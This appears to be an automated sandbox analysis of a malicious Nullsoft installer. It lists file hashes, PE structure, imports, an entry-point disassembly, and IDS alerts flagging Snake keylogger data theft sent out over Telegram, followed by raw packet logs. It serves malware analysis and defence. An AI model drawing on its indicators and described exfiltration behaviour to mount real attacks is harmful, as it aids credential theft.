                                                                                                          • Filename: Yoranis Setup.exe, Detection: malicious, Browse
                                                                                                          • Filename: Pralevia Setup 1.0.0.exe, Detection: malicious, Browse
                                                                                                          • Filename: Pralevia Setup 1.0.0.exe, Detection: malicious, Browse
                                                                                                          • Filename: NativeApp_G5L1NHZZ.exe, Detection: malicious, Browse
                                                                                                          • Filename: Awb 4586109146.bat.exe, Detection: malicious, Browse
                                                                                                          Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......qr*.5.D.5.D.5.D...J.2.D.5.E.!.D.....2.D.a0t.1.D.V1n.4.D..3@.4.D.Rich5.D.........PE..L....~.\...........!....."...........).......@...............................p............@..........................B.......@..P............................`.......................................................@..X............................text.... .......".................. ..`.rdata..c....@.......&..............@..@.data...x....P.......*..............@....reloc.......`.......,..............@..B................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                                          File type:PE32 executable (GUI) Intel 80386, for MS Windows, Nullsoft Installer self-extracting archive
                                                                                                          Entropy (8bit):7.958826864523069
                                                                                                          TrID:
                                                                                                          • Win32 Executable (generic) a (10002005/4) 99.96%
                                                                                                          • Generic Win/DOS Executable (2004/3) 0.02%
                                                                                                          • DOS Executable Generic (2002/1) 0.02%
                                                                                                          • Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
                                                                                                          File name:4UQ5wnI389.exe
                                                                                                          File size:1'007'544 bytes
                                                                                                          MD5:f28c3285968229b7e0c723633fb5c161
                                                                                                          SHA1:8be784dccfd84953c94642021a261a4459c68df8
                                                                                                          SHA256:280344d8a94a23a0e351b1c1553ed3f1ae6db9c06c75ecda292211f5562de552
                                                                                                          SHA512:3d4fef27b561a06e008d62f66f0b7981395e86a7a2b138110e9e08e7790bc98f038c13a606c0d12d72966fce37effc735ea12a292db959529dd9aaafadf8001c
                                                                                                          SSDEEP:24576:9jwKCNPkrUC1yYQemy1+GOj3iQhDzKZukJETb9HLIpk:V1CFkzm/jyrzendJ
                                                                                                          TLSH:C025330AA096DE47D1D68BF0A60798EF7D756D0308A0D65737600E2E3E39AFB8D197D0
                                                                                                          File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........1...Pf..Pf..Pf.*_9..Pf..Pg.LPf.*_;..Pf..sV..Pf..V`..Pf.Rich.Pf.........................PE..L...$..\.................f...*.....
                                                                                                          Icon Hash:46224e4c19391d03
                                                                                                          Entrypoint:0x4034a5
                                                                                                          Entrypoint Section:.text
                                                                                                          Digitally signed:false
                                                                                                          Imagebase:0x400000
                                                                                                          Subsystem:windows gui
                                                                                                          Image File Characteristics:RELOCS_STRIPPED, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, 32BIT_MACHINE
                                                                                                          DLL Characteristics:DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
                                                                                                          Time Stamp:0x5C157F24 [Sat Dec 15 22:24:36 2018 UTC]
                                                                                                          TLS Callbacks:
                                                                                                          CLR (.Net) Version:
                                                                                                          OS Version Major:4
                                                                                                          OS Version Minor:0
                                                                                                          File Version Major:4
                                                                                                          File Version Minor:0
                                                                                                          Subsystem Version Major:4
                                                                                                          Subsystem Version Minor:0
                                                                                                          Import Hash:1f23f452093b5c1ff091a2f9fb4fa3e9
                                                                                                          Instruction
                                                                                                          sub esp, 000002D4h
                                                                                                          push ebx
                                                                                                          push esi
                                                                                                          push edi
                                                                                                          push 00000020h
                                                                                                          pop edi
                                                                                                          xor ebx, ebx
                                                                                                          push 00008001h
                                                                                                          mov dword ptr [esp+14h], ebx
                                                                                                          mov dword ptr [esp+10h], 0040A230h
                                                                                                          mov dword ptr [esp+1Ch], ebx
                                                                                                          call dword ptr [004080ACh]
                                                                                                          call dword ptr [004080A8h]
                                                                                                          and eax, BFFFFFFFh
                                                                                                          cmp ax, 00000006h
                                                                                                          mov dword ptr [0042A24Ch], eax
                                                                                                          je 00007F309919D453h
                                                                                                          push ebx
                                                                                                          call 00007F30991A071Dh
                                                                                                          cmp eax, ebx
                                                                                                          je 00007F309919D449h
                                                                                                          push 00000C00h
                                                                                                          call eax
                                                                                                          mov esi, 004082B0h
                                                                                                          push esi
                                                                                                          call 00007F30991A0697h
                                                                                                          push esi
                                                                                                          call dword ptr [00408150h]
                                                                                                          lea esi, dword ptr [esi+eax+01h]
                                                                                                          cmp byte ptr [esi], 00000000h
                                                                                                          jne 00007F309919D42Ch
                                                                                                          push 0000000Ah
                                                                                                          call 00007F30991A06F0h
                                                                                                          push 00000008h
                                                                                                          call 00007F30991A06E9h
                                                                                                          push 00000006h
                                                                                                          mov dword ptr [0042A244h], eax
                                                                                                          call 00007F30991A06DDh
                                                                                                          cmp eax, ebx
                                                                                                          je 00007F309919D451h
                                                                                                          push 0000001Eh
                                                                                                          call eax
                                                                                                          test eax, eax
                                                                                                          je 00007F309919D449h
                                                                                                          or byte ptr [0042A24Fh], 00000040h
                                                                                                          push ebp
                                                                                                          call dword ptr [00408044h]
                                                                                                          push ebx
                                                                                                          call dword ptr [004082A0h]
                                                                                                          mov dword ptr [0042A318h], eax
                                                                                                          push ebx
                                                                                                          lea eax, dword ptr [esp+34h]
                                                                                                          push 000002B4h
                                                                                                          push eax
                                                                                                          push ebx
                                                                                                          push 004216E8h
                                                                                                          call dword ptr [00408188h]
                                                                                                          push 0040A384h
                                                                                                          Programming Language:
                                                                                                          • [EXP] VC++ 6.0 SP5 build 8804
                                                                                                          NameVirtual AddressVirtual Size Is in Section
                                                                                                          IMAGE_DIRECTORY_ENTRY_EXPORT0x00x0
                                                                                                          IMAGE_DIRECTORY_ENTRY_IMPORT0x85040xa0.rdata
                                                                                                          IMAGE_DIRECTORY_ENTRY_RESOURCE0x550000x21068.rsrc
                                                                                                          IMAGE_DIRECTORY_ENTRY_EXCEPTION0x00x0
                                                                                                          IMAGE_DIRECTORY_ENTRY_SECURITY0x00x0
                                                                                                          IMAGE_DIRECTORY_ENTRY_BASERELOC0x00x0
                                                                                                          IMAGE_DIRECTORY_ENTRY_DEBUG0x00x0
                                                                                                          IMAGE_DIRECTORY_ENTRY_COPYRIGHT0x00x0
                                                                                                          IMAGE_DIRECTORY_ENTRY_GLOBALPTR0x00x0
                                                                                                          IMAGE_DIRECTORY_ENTRY_TLS0x00x0
                                                                                                          IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG0x00x0
                                                                                                          IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT0x00x0
                                                                                                          IMAGE_DIRECTORY_ENTRY_IAT0x80000x2b0.rdata
                                                                                                          IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT0x00x0
                                                                                                          IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR0x00x0
                                                                                                          IMAGE_DIRECTORY_ENTRY_RESERVED0x00x0
                                                                                                          NameVirtual AddressVirtual SizeRaw SizeMD5Xored PEZLIB ComplexityFile TypeEntropyCharacteristics
                                                                                                          .text0x10000x64090x6600bfe2b726d49cbd922b87bad5eea65e61False0.6540287990196079data6.416186322230332IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                                                                                                          .rdata0x80000x13960x1400d45dcba8ca646543f7e339e20089687eFalse0.45234375data5.154907432640367IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                                                                                          .data0xa0000x203580x6008575fc5e872ca789611c386779287649False0.5026041666666666data4.004402321344153IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                                                                                          .ndata0x2b0000x2a0000x0d41d8cd98f00b204e9800998ecf8427eFalse0empty0.0IMAGE_SCN_CNT_UNINITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                                                                                          .rsrc0x550000x210680x2120003ed2ed76ba15352dac9e48819696134False0.8714696344339623data7.556190648348207IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                                                                                          NameRVASizeTypeLanguageCountryZLIB Complexity
                                                                                                          RT_BITMAP0x554c00x368Device independent bitmap graphic, 96 x 16 x 4, image size 768EnglishUnited States0.23623853211009174
                                                                                                          RT_ICON0x558280xc2a3PNG image data, 256 x 256, 8-bit/color RGBA, non-interlacedEnglishUnited States0.9966684729162903
                                                                                                          RT_ICON0x61ad00x86e0PNG image data, 256 x 256, 8-bit/color RGBA, non-interlacedEnglishUnited States0.990210843373494
                                                                                                          RT_ICON0x6a1b00x5085PNG image data, 256 x 256, 8-bit/color RGBA, non-interlacedEnglishUnited States0.9867559307233299
                                                                                                          RT_ICON0x6f2380x25a8Device independent bitmap graphic, 48 x 96 x 32, image size 9600EnglishUnited States0.4358921161825726
                                                                                                          RT_ICON0x717e00x10a8Device independent bitmap graphic, 32 x 64 x 32, image size 4224EnglishUnited States0.4896810506566604
                                                                                                          RT_ICON0x728880xea8Device independent bitmap graphic, 48 x 96 x 8, image size 2304, 256 important colorsEnglishUnited States0.5367803837953091
                                                                                                          RT_ICON0x737300x8a8Device independent bitmap graphic, 32 x 64 x 8, image size 1024, 256 important colorsEnglishUnited States0.6913357400722022
                                                                                                          RT_ICON0x73fd80x668Device independent bitmap graphic, 48 x 96 x 4, image size 1152EnglishUnited States0.38597560975609757
                                                                                                          RT_ICON0x746400x568Device independent bitmap graphic, 16 x 32 x 8, image size 256, 256 important colorsEnglishUnited States0.4934971098265896
                                                                                                          RT_ICON0x74ba80x468Device independent bitmap graphic, 16 x 32 x 32, image size 1088EnglishUnited States0.651595744680851
                                                                                                          RT_ICON0x750100x2e8Device independent bitmap graphic, 32 x 64 x 4, image size 512EnglishUnited States0.46908602150537637
                                                                                                          RT_ICON0x752f80x128Device independent bitmap graphic, 16 x 32 x 4, image size 128EnglishUnited States0.5472972972972973
                                                                                                          RT_DIALOG0x754200x120dataEnglishUnited States0.53125
                                                                                                          RT_DIALOG0x755400x118dataEnglishUnited States0.5678571428571428
                                                                                                          RT_DIALOG0x756580x120dataEnglishUnited States0.5104166666666666
                                                                                                          RT_DIALOG0x757780xf8dataEnglishUnited States0.6330645161290323
                                                                                                          RT_DIALOG0x758700xa0dataEnglishUnited States0.6125
                                                                                                          RT_DIALOG0x759100x60dataEnglishUnited States0.7291666666666666
                                                                                                          RT_GROUP_ICON0x759700xaedataEnglishUnited States0.6091954022988506
                                                                                                          RT_VERSION0x75a200x308dataEnglishUnited States0.47036082474226804
                                                                                                          RT_MANIFEST0x75d280x33eXML 1.0 document, ASCII text, with very long lines (830), with no line terminatorsEnglishUnited States0.5542168674698795
                                                                                                          DLLImport
                                                                                                          KERNEL32.dllExitProcess, SetFileAttributesW, Sleep, GetTickCount, CreateFileW, GetFileSize, GetModuleFileNameW, GetCurrentProcess, SetCurrentDirectoryW, GetFileAttributesW, SetEnvironmentVariableW, GetWindowsDirectoryW, GetTempPathW, GetCommandLineW, GetVersion, SetErrorMode, lstrlenW, lstrcpynW, CopyFileW, GetShortPathNameW, GlobalLock, CreateThread, GetLastError, CreateDirectoryW, CreateProcessW, RemoveDirectoryW, lstrcmpiA, GetTempFileNameW, WriteFile, lstrcpyA, MoveFileExW, lstrcatW, GetSystemDirectoryW, GetProcAddress, GetModuleHandleA, GetExitCodeProcess, WaitForSingleObject, lstrcmpiW, MoveFileW, GetFullPathNameW, SetFileTime, SearchPathW, CompareFileTime, lstrcmpW, CloseHandle, ExpandEnvironmentStringsW, GlobalFree, GlobalUnlock, GetDiskFreeSpaceW, GlobalAlloc, FindFirstFileW, FindNextFileW, DeleteFileW, SetFilePointer, ReadFile, FindClose, lstrlenA, MulDiv, MultiByteToWideChar, WideCharToMultiByte, GetPrivateProfileStringW, WritePrivateProfileStringW, FreeLibrary, LoadLibraryExW, GetModuleHandleW
                                                                                                          USER32.dllGetSystemMenu, SetClassLongW, EnableMenuItem, IsWindowEnabled, SetWindowPos, GetSysColor, GetWindowLongW, SetCursor, LoadCursorW, CheckDlgButton, GetMessagePos, LoadBitmapW, CallWindowProcW, IsWindowVisible, CloseClipboard, SetClipboardData, EmptyClipboard, OpenClipboard, ScreenToClient, GetWindowRect, GetDlgItem, GetSystemMetrics, SetDlgItemTextW, GetDlgItemTextW, MessageBoxIndirectW, CharPrevW, CharNextA, wsprintfA, DispatchMessageW, PeekMessageW, ReleaseDC, EnableWindow, InvalidateRect, SendMessageW, DefWindowProcW, BeginPaint, GetClientRect, FillRect, DrawTextW, EndDialog, RegisterClassW, SystemParametersInfoW, CreateWindowExW, GetClassInfoW, DialogBoxParamW, CharNextW, ExitWindowsEx, DestroyWindow, GetDC, SetTimer, SetWindowTextW, LoadImageW, SetForegroundWindow, ShowWindow, IsWindow, SetWindowLongW, FindWindowExW, TrackPopupMenu, AppendMenuW, CreatePopupMenu, EndPaint, CreateDialogParamW, SendMessageTimeoutW, wsprintfW, PostQuitMessage
                                                                                                          GDI32.dllSelectObject, SetBkMode, CreateFontIndirectW, SetTextColor, DeleteObject, GetDeviceCaps, CreateBrushIndirect, SetBkColor
                                                                                                          SHELL32.dllSHGetSpecialFolderLocation, ShellExecuteExW, SHGetPathFromIDListW, SHBrowseForFolderW, SHGetFileInfoW, SHFileOperationW
                                                                                                          ADVAPI32.dllAdjustTokenPrivileges, RegCreateKeyExW, RegOpenKeyExW, SetFileSecurityW, OpenProcessToken, LookupPrivilegeValueW, RegEnumValueW, RegDeleteKeyW, RegDeleteValueW, RegCloseKey, RegSetValueExW, RegQueryValueExW, RegEnumKeyW
                                                                                                          COMCTL32.dllImageList_Create, ImageList_AddMasked, ImageList_Destroy
                                                                                                          ole32.dllOleUninitialize, OleInitialize, CoTaskMemFree, CoCreateInstance
                                                                                                          Language of compilation systemCountry where language is spokenMap
                                                                                                          EnglishUnited States
                                                                                                          TimestampSIDSignatureSeveritySource IPSource PortDest IPDest PortProtocol
                                                                                                          2025-01-10T21:25:12.948033+01002803270ETPRO MALWARE Common Downloader Header Pattern UHCa2192.168.2.849708142.250.186.78443TCP
                                                                                                          2025-01-10T21:25:26.788911+01002803274ETPRO MALWARE Common Downloader Header Pattern UH2192.168.2.849711158.101.44.24280TCP
                                                                                                          2025-01-10T21:25:33.617012+01002803274ETPRO MALWARE Common Downloader Header Pattern UH2192.168.2.849711158.101.44.24280TCP
                                                                                                          2025-01-10T21:25:34.243472+01001810008Joe Security ANOMALY Telegram Send File1192.168.2.849724149.154.167.220443TCP
                                                                                                          2025-01-10T21:25:36.607170+01002057744ET MALWARE Snake/Best Private Keylogger CnC Exfil Via Telegram1192.168.2.849724149.154.167.220443TCP
                                                                                                          2025-01-10T21:25:38.007777+01002803274ETPRO MALWARE Common Downloader Header Pattern UH2192.168.2.849745158.101.44.24280TCP
                                                                                                          2025-01-10T21:25:38.597069+01001810008Joe Security ANOMALY Telegram Send File1192.168.2.849751149.154.167.220443TCP
                                                                                                          2025-01-10T21:25:38.885501+01002057744ET MALWARE Snake/Best Private Keylogger CnC Exfil Via Telegram1192.168.2.849751149.154.167.220443TCP
                                                                                                          2025-01-10T21:25:42.066599+01001810008Joe Security ANOMALY Telegram Send File1192.168.2.849778149.154.167.220443TCP
                                                                                                          2025-01-10T21:25:42.267307+01002057744ET MALWARE Snake/Best Private Keylogger CnC Exfil Via Telegram1192.168.2.849778149.154.167.220443TCP
                                                                                                          2025-01-10T21:25:43.511266+01001810008Joe Security ANOMALY Telegram Send File1192.168.2.849785149.154.167.220443TCP
                                                                                                          2025-01-10T21:25:43.686228+01002057744ET MALWARE Snake/Best Private Keylogger CnC Exfil Via Telegram1192.168.2.849785149.154.167.220443TCP
                                                                                                          2025-01-10T21:25:45.909104+01001810008Joe Security ANOMALY Telegram Send File1192.168.2.849802149.154.167.220443TCP
                                                                                                          2025-01-10T21:25:46.161082+01002057744ET MALWARE Snake/Best Private Keylogger CnC Exfil Via Telegram1192.168.2.849802149.154.167.220443TCP
                                                                                                          2025-01-10T21:25:47.365103+01001810008Joe Security ANOMALY Telegram Send File1192.168.2.849814149.154.167.220443TCP
                                                                                                          2025-01-10T21:25:48.476323+01002057744ET MALWARE Snake/Best Private Keylogger CnC Exfil Via Telegram1192.168.2.849814149.154.167.220443TCP
                                                                                                          2025-01-10T21:25:49.719264+01001810008Joe Security ANOMALY Telegram Send File1192.168.2.849826149.154.167.220443TCP
                                                                                                          2025-01-10T21:25:49.899223+01002057744ET MALWARE Snake/Best Private Keylogger CnC Exfil Via Telegram1192.168.2.849826149.154.167.220443TCP
                                                                                                          2025-01-10T21:25:51.193548+01001810008Joe Security ANOMALY Telegram Send File1192.168.2.849838149.154.167.220443TCP
                                                                                                          2025-01-10T21:25:51.442796+01002057744ET MALWARE Snake/Best Private Keylogger CnC Exfil Via Telegram1192.168.2.849838149.154.167.220443TCP
                                                                                                          2025-01-10T21:25:54.693478+01001810008Joe Security ANOMALY Telegram Send File1192.168.2.849862149.154.167.220443TCP
                                                                                                          2025-01-10T21:25:54.951438+01002057744ET MALWARE Snake/Best Private Keylogger CnC Exfil Via Telegram1192.168.2.849862149.154.167.220443TCP
                                                                                                          2025-01-10T21:26:02.276649+01001810008Joe Security ANOMALY Telegram Send File1192.168.2.849913149.154.167.220443TCP
                                                                                                          2025-01-10T21:26:02.454225+01002057744ET MALWARE Snake/Best Private Keylogger CnC Exfil Via Telegram1192.168.2.849913149.154.167.220443TCP
                                                                                                          2025-01-10T21:26:05.931191+01001810008Joe Security ANOMALY Telegram Send File1192.168.2.849939149.154.167.220443TCP
                                                                                                          2025-01-10T21:26:06.180000+01002057744ET MALWARE Snake/Best Private Keylogger CnC Exfil Via Telegram1192.168.2.849939149.154.167.220443TCP
                                                                                                          2025-01-10T21:26:12.110863+01001810008Joe Security ANOMALY Telegram Send File1192.168.2.849981149.154.167.220443TCP
                                                                                                          2025-01-10T21:26:12.402659+01002057744ET MALWARE Snake/Best Private Keylogger CnC Exfil Via Telegram1192.168.2.849981149.154.167.220443TCP
                                                                                                          2025-01-10T21:26:13.640645+01001810008Joe Security ANOMALY Telegram Send File1192.168.2.849992149.154.167.220443TCP
                                                                                                          2025-01-10T21:26:13.818735+01002057744ET MALWARE Snake/Best Private Keylogger CnC Exfil Via Telegram1192.168.2.849992149.154.167.220443TCP
                                                                                                          2025-01-10T21:26:16.047903+01001810008Joe Security ANOMALY Telegram Send File1192.168.2.850006149.154.167.220443TCP
                                                                                                          2025-01-10T21:26:16.222254+01002057744ET MALWARE Snake/Best Private Keylogger CnC Exfil Via Telegram1192.168.2.850006149.154.167.220443TCP
                                                                                                          2025-01-10T21:26:17.585743+01001810008Joe Security ANOMALY Telegram Send File1192.168.2.850008149.154.167.220443TCP
                                                                                                          2025-01-10T21:26:17.759166+01002057744ET MALWARE Snake/Best Private Keylogger CnC Exfil Via Telegram1192.168.2.850008149.154.167.220443TCP
                                                                                                          2025-01-10T21:26:25.835431+01001810008Joe Security ANOMALY Telegram Send File1192.168.2.850011149.154.167.220443TCP
                                                                                                          2025-01-10T21:26:26.089180+01002057744ET MALWARE Snake/Best Private Keylogger CnC Exfil Via Telegram1192.168.2.850011149.154.167.220443TCP
                                                                                                          TimestampSource PortDest PortSource IPDest IP
                                                                                                          Jan 10, 2025 21:25:11.866556883 CET49708443192.168.2.8142.250.186.78
                                                                                                          Jan 10, 2025 21:25:11.866600037 CET44349708142.250.186.78192.168.2.8
                                                                                                          Jan 10, 2025 21:25:11.866683006 CET49708443192.168.2.8142.250.186.78
                                                                                                          Jan 10, 2025 21:25:11.897017002 CET49708443192.168.2.8142.250.186.78
                                                                                                          Jan 10, 2025 21:25:11.897032022 CET44349708142.250.186.78192.168.2.8
                                                                                                          Jan 10, 2025 21:25:12.558836937 CET44349708142.250.186.78192.168.2.8
                                                                                                          Jan 10, 2025 21:25:12.558953047 CET49708443192.168.2.8142.250.186.78
                                                                                                          Jan 10, 2025 21:25:12.560558081 CET44349708142.250.186.78192.168.2.8
                                                                                                          Jan 10, 2025 21:25:12.560609102 CET49708443192.168.2.8142.250.186.78
                                                                                                          Jan 10, 2025 21:25:12.624341965 CET49708443192.168.2.8142.250.186.78
                                                                                                          Jan 10, 2025 21:25:12.624372959 CET44349708142.250.186.78192.168.2.8
                                                                                                          Jan 10, 2025 21:25:12.624741077 CET44349708142.250.186.78192.168.2.8
                                                                                                          Jan 10, 2025 21:25:12.624830961 CET49708443192.168.2.8142.250.186.78
                                                                                                          Jan 10, 2025 21:25:12.628591061 CET49708443192.168.2.8142.250.186.78
                                                                                                          Jan 10, 2025 21:25:12.671334028 CET44349708142.250.186.78192.168.2.8
                                                                                                          Jan 10, 2025 21:25:12.947999001 CET44349708142.250.186.78192.168.2.8
                                                                                                          Jan 10, 2025 21:25:12.948090076 CET49708443192.168.2.8142.250.186.78
                                                                                                          Jan 10, 2025 21:25:12.948339939 CET49708443192.168.2.8142.250.186.78
                                                                                                          Jan 10, 2025 21:25:12.948381901 CET44349708142.250.186.78192.168.2.8
                                                                                                          Jan 10, 2025 21:25:12.948512077 CET49708443192.168.2.8142.250.186.78
                                                                                                          Jan 10, 2025 21:25:12.990782976 CET49710443192.168.2.8216.58.206.33
                                                                                                          Jan 10, 2025 21:25:12.990861893 CET44349710216.58.206.33192.168.2.8
                                                                                                          Jan 10, 2025 21:25:12.990953922 CET49710443192.168.2.8216.58.206.33
                                                                                                          Jan 10, 2025 21:25:12.991281986 CET49710443192.168.2.8216.58.206.33
                                                                                                          Jan 10, 2025 21:25:12.991297007 CET44349710216.58.206.33192.168.2.8
                                                                                                          Jan 10, 2025 21:25:13.677922964 CET44349710216.58.206.33192.168.2.8
                                                                                                          Jan 10, 2025 21:25:13.678014040 CET49710443192.168.2.8216.58.206.33
                                                                                                          Jan 10, 2025 21:25:13.684185028 CET49710443192.168.2.8216.58.206.33
                                                                                                          Jan 10, 2025 21:25:13.684205055 CET44349710216.58.206.33192.168.2.8
                                                                                                          Jan 10, 2025 21:25:13.684428930 CET44349710216.58.206.33192.168.2.8
                                                                                                          Jan 10, 2025 21:25:13.684489965 CET49710443192.168.2.8216.58.206.33
                                                                                                          Jan 10, 2025 21:25:13.691621065 CET49710443192.168.2.8216.58.206.33
                                                                                                          Jan 10, 2025 21:25:13.735354900 CET44349710216.58.206.33192.168.2.8
                                                                                                          Jan 10, 2025 21:25:16.290021896 CET44349710216.58.206.33192.168.2.8
                                                                                                          Jan 10, 2025 21:25:16.290141106 CET49710443192.168.2.8216.58.206.33
                                                                                                          Jan 10, 2025 21:25:16.295675993 CET44349710216.58.206.33192.168.2.8
                                                                                                          Jan 10, 2025 21:25:16.295768023 CET49710443192.168.2.8216.58.206.33
                                                                                                          Jan 10, 2025 21:25:16.309463024 CET44349710216.58.206.33192.168.2.8
                                                                                                          Jan 10, 2025 21:25:16.309547901 CET49710443192.168.2.8216.58.206.33
                                                                                                          Jan 10, 2025 21:25:16.309568882 CET44349710216.58.206.33192.168.2.8
                                                                                                          Jan 10, 2025 21:25:16.309617996 CET49710443192.168.2.8216.58.206.33
                                                                                                          Jan 10, 2025 21:25:16.317594051 CET44349710216.58.206.33192.168.2.8
                                                                                                          Jan 10, 2025 21:25:16.317687035 CET49710443192.168.2.8216.58.206.33
                                                                                                          Jan 10, 2025 21:25:16.382086992 CET44349710216.58.206.33192.168.2.8
                                                                                                          Jan 10, 2025 21:25:16.382179976 CET44349710216.58.206.33192.168.2.8
                                                                                                          Jan 10, 2025 21:25:16.382209063 CET49710443192.168.2.8216.58.206.33
                                                                                                          Jan 10, 2025 21:25:16.382249117 CET44349710216.58.206.33192.168.2.8
                                                                                                          Jan 10, 2025 21:25:16.382263899 CET49710443192.168.2.8216.58.206.33
                                                                                                          Jan 10, 2025 21:25:16.382299900 CET49710443192.168.2.8216.58.206.33
                                                                                                          Jan 10, 2025 21:25:16.382416010 CET44349710216.58.206.33192.168.2.8
                                                                                                          Jan 10, 2025 21:25:16.382471085 CET49710443192.168.2.8216.58.206.33
                                                                                                          Jan 10, 2025 21:25:16.382478952 CET44349710216.58.206.33192.168.2.8
                                                                                                          Jan 10, 2025 21:25:16.382524967 CET49710443192.168.2.8216.58.206.33
                                                                                                          Jan 10, 2025 21:25:16.385323048 CET44349710216.58.206.33192.168.2.8
                                                                                                          Jan 10, 2025 21:25:16.385456085 CET49710443192.168.2.8216.58.206.33
                                                                                                          Jan 10, 2025 21:25:16.385478020 CET44349710216.58.206.33192.168.2.8
                                                                                                          Jan 10, 2025 21:25:16.385545969 CET49710443192.168.2.8216.58.206.33
                                                                                                          Jan 10, 2025 21:25:16.391592026 CET44349710216.58.206.33192.168.2.8
                                                                                                          Jan 10, 2025 21:25:16.391668081 CET49710443192.168.2.8216.58.206.33
                                                                                                          Jan 10, 2025 21:25:16.391678095 CET44349710216.58.206.33192.168.2.8
                                                                                                          Jan 10, 2025 21:25:16.391755104 CET49710443192.168.2.8216.58.206.33
                                                                                                          Jan 10, 2025 21:25:16.397901058 CET44349710216.58.206.33192.168.2.8
                                                                                                          Jan 10, 2025 21:25:16.398042917 CET49710443192.168.2.8216.58.206.33
                                                                                                          Jan 10, 2025 21:25:16.398063898 CET44349710216.58.206.33192.168.2.8
                                                                                                          Jan 10, 2025 21:25:16.398129940 CET49710443192.168.2.8216.58.206.33
                                                                                                          Jan 10, 2025 21:25:16.404081106 CET44349710216.58.206.33192.168.2.8
                                                                                                          Jan 10, 2025 21:25:16.404195070 CET49710443192.168.2.8216.58.206.33
                                                                                                          Jan 10, 2025 21:25:16.404244900 CET44349710216.58.206.33192.168.2.8
                                                                                                          Jan 10, 2025 21:25:16.404301882 CET49710443192.168.2.8216.58.206.33
                                                                                                          Jan 10, 2025 21:25:16.410434961 CET44349710216.58.206.33192.168.2.8
                                                                                                          Jan 10, 2025 21:25:16.410505056 CET49710443192.168.2.8216.58.206.33
                                                                                                          Jan 10, 2025 21:25:16.410520077 CET44349710216.58.206.33192.168.2.8
                                                                                                          Jan 10, 2025 21:25:16.410574913 CET49710443192.168.2.8216.58.206.33
                                                                                                          Jan 10, 2025 21:25:16.416728973 CET44349710216.58.206.33192.168.2.8
                                                                                                          Jan 10, 2025 21:25:16.416826010 CET49710443192.168.2.8216.58.206.33
                                                                                                          Jan 10, 2025 21:25:16.416857004 CET44349710216.58.206.33192.168.2.8
                                                                                                          Jan 10, 2025 21:25:16.416922092 CET49710443192.168.2.8216.58.206.33
                                                                                                          Jan 10, 2025 21:25:16.422672987 CET44349710216.58.206.33192.168.2.8
                                                                                                          Jan 10, 2025 21:25:16.422749043 CET49710443192.168.2.8216.58.206.33
                                                                                                          Jan 10, 2025 21:25:16.422769070 CET44349710216.58.206.33192.168.2.8
                                                                                                          Jan 10, 2025 21:25:16.422837973 CET49710443192.168.2.8216.58.206.33
                                                                                                          Jan 10, 2025 21:25:16.428656101 CET44349710216.58.206.33192.168.2.8
                                                                                                          Jan 10, 2025 21:25:16.428754091 CET49710443192.168.2.8216.58.206.33
                                                                                                          Jan 10, 2025 21:25:16.428775072 CET44349710216.58.206.33192.168.2.8
                                                                                                          Jan 10, 2025 21:25:16.428826094 CET49710443192.168.2.8216.58.206.33
                                                                                                          Jan 10, 2025 21:25:16.434581995 CET44349710216.58.206.33192.168.2.8
                                                                                                          Jan 10, 2025 21:25:16.434730053 CET49710443192.168.2.8216.58.206.33
                                                                                                          Jan 10, 2025 21:25:16.434747934 CET44349710216.58.206.33192.168.2.8
                                                                                                          Jan 10, 2025 21:25:16.434815884 CET49710443192.168.2.8216.58.206.33
                                                                                                          Jan 10, 2025 21:25:16.440573931 CET44349710216.58.206.33192.168.2.8
                                                                                                          Jan 10, 2025 21:25:16.440658092 CET49710443192.168.2.8216.58.206.33
                                                                                                          Jan 10, 2025 21:25:16.451926947 CET44349710216.58.206.33192.168.2.8
                                                                                                          Jan 10, 2025 21:25:16.452039003 CET49710443192.168.2.8216.58.206.33
                                                                                                          Jan 10, 2025 21:25:16.452069044 CET44349710216.58.206.33192.168.2.8
                                                                                                          Jan 10, 2025 21:25:16.452146053 CET49710443192.168.2.8216.58.206.33
                                                                                                          Jan 10, 2025 21:25:16.474239111 CET44349710216.58.206.33192.168.2.8
                                                                                                          Jan 10, 2025 21:25:16.474339962 CET49710443192.168.2.8216.58.206.33
                                                                                                          Jan 10, 2025 21:25:16.474366903 CET44349710216.58.206.33192.168.2.8
                                                                                                          Jan 10, 2025 21:25:16.474442005 CET49710443192.168.2.8216.58.206.33
                                                                                                          Jan 10, 2025 21:25:16.474462986 CET44349710216.58.206.33192.168.2.8
                                                                                                          Jan 10, 2025 21:25:16.474534988 CET49710443192.168.2.8216.58.206.33
                                                                                                          Jan 10, 2025 21:25:16.474816084 CET44349710216.58.206.33192.168.2.8
                                                                                                          Jan 10, 2025 21:25:16.474853992 CET44349710216.58.206.33192.168.2.8
                                                                                                          Jan 10, 2025 21:25:16.474875927 CET44349710216.58.206.33192.168.2.8
                                                                                                          Jan 10, 2025 21:25:16.474896908 CET49710443192.168.2.8216.58.206.33
                                                                                                          Jan 10, 2025 21:25:16.474905014 CET44349710216.58.206.33192.168.2.8
                                                                                                          Jan 10, 2025 21:25:16.474973917 CET49710443192.168.2.8216.58.206.33
                                                                                                          Jan 10, 2025 21:25:16.475800037 CET44349710216.58.206.33192.168.2.8
                                                                                                          Jan 10, 2025 21:25:16.475858927 CET49710443192.168.2.8216.58.206.33
                                                                                                          Jan 10, 2025 21:25:16.475862026 CET44349710216.58.206.33192.168.2.8
                                                                                                          Jan 10, 2025 21:25:16.475874901 CET44349710216.58.206.33192.168.2.8
                                                                                                          Jan 10, 2025 21:25:16.475912094 CET49710443192.168.2.8216.58.206.33
                                                                                                          Jan 10, 2025 21:25:16.475950003 CET49710443192.168.2.8216.58.206.33
